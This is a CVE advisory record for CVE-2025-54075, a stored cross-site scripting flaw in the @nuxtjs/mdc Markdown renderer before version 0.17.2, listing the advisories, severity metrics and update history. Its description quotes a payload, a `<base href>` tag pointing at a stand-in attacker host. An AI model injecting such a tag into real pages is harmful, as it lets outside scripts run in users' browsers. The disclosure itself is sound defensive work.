MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a `<base href="https://attacker.tld">` element. The `<base>` tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context. Version 0.17.2 contains a fix for the issue.
Advisories
Source ID Title
EUVD EUVD EUVD-2025-21892 Nuxt MDC has an XSS vulnerability in markdown rendering that bypasses HTML filtering
Github GHSA Github GHSA GHSA-cj6r-rrr9-fg82 Nuxt MDC has an XSS vulnerability in markdown rendering that bypasses HTML filtering
Fixes

Solution

No solution given by the vendor.


Workaround

No workaround given by the vendor.

History

Tue, 22 Jul 2025 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 18 Jul 2025 16:00:00 +0000

Type Values Removed Values Added
Description MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a `<base href="https://attacker.tld">` element. The `<base>` tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context. Version 0.17.2 contains a fix for the issue.
Title mdc vulnerable to XSS in markdown rendering bypassing HTML filter. (N°4)
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 8.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L'}


cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2025-07-22T15:14:53.051Z

Reserved: 2025-07-16T13:22:18.205Z

Link: CVE-2025-54075

cve-icon Vulnrichment

Updated: 2025-07-22T15:14:45.477Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2025-07-18T16:15:30.557

Modified: 2025-07-22T16:15:33.560

Link: CVE-2025-54075

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

No data.